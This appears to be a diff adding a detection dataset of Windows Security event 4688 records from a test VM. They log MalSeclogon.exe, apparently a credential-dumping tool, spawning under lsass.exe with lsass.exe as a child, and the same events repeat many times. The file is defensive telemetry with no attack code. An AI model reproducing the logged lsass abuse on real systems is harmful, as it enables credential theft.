+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x17b8</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.462545Z"">
+    </TimeCreated>
+    <EventRecordID>329916</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x1bc4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.397814Z"">
+    </TimeCreated>
+    <EventRecordID>329914</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""NewProcessId"">0x21a4</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1937</Data>
+    <Data Name=""ProcessId"">0x2480</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:08.723523Z"">
+    </TimeCreated>
+    <EventRecordID>329925</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x24e0</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-19</Data>
+    <Data Name=""TargetUserName"">LOCAL SERVICE</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e5</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.680005Z"">
+    </TimeCreated>
+    <EventRecordID>329921</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x1494</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""TargetDomainName"">WORKGROUP</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.641209Z"">
+    </TimeCreated>
+    <EventRecordID>329920</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x11e4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\conhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x17b8</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.619364Z"">
+    </TimeCreated>
+    <EventRecordID>329919</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x17b8</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.462545Z"">
+    </TimeCreated>
+    <EventRecordID>329916</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x1bc4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.397814Z"">
+    </TimeCreated>
+    <EventRecordID>329914</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""NewProcessId"">0x21a4</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1937</Data>
+    <Data Name=""ProcessId"">0x2480</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:08.723523Z"">
+    </TimeCreated>
+    <EventRecordID>329925</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x24e0</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-19</Data>
+    <Data Name=""TargetUserName"">LOCAL SERVICE</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e5</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.680005Z"">
+    </TimeCreated>
+    <EventRecordID>329921</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x1494</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""TargetDomainName"">WORKGROUP</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.641209Z"">
+    </TimeCreated>
+    <EventRecordID>329920</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x11e4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\conhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x17b8</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.619364Z"">
+    </TimeCreated>
+    <EventRecordID>329919</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x17b8</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.462545Z"">
+    </TimeCreated>
+    <EventRecordID>329916</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x1bc4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.397814Z"">
+    </TimeCreated>
+    <EventRecordID>329914</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""NewProcessId"">0x21a4</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1937</Data>
+    <Data Name=""ProcessId"">0x2480</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:08.723523Z"">
+    </TimeCreated>
+    <EventRecordID>329925</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
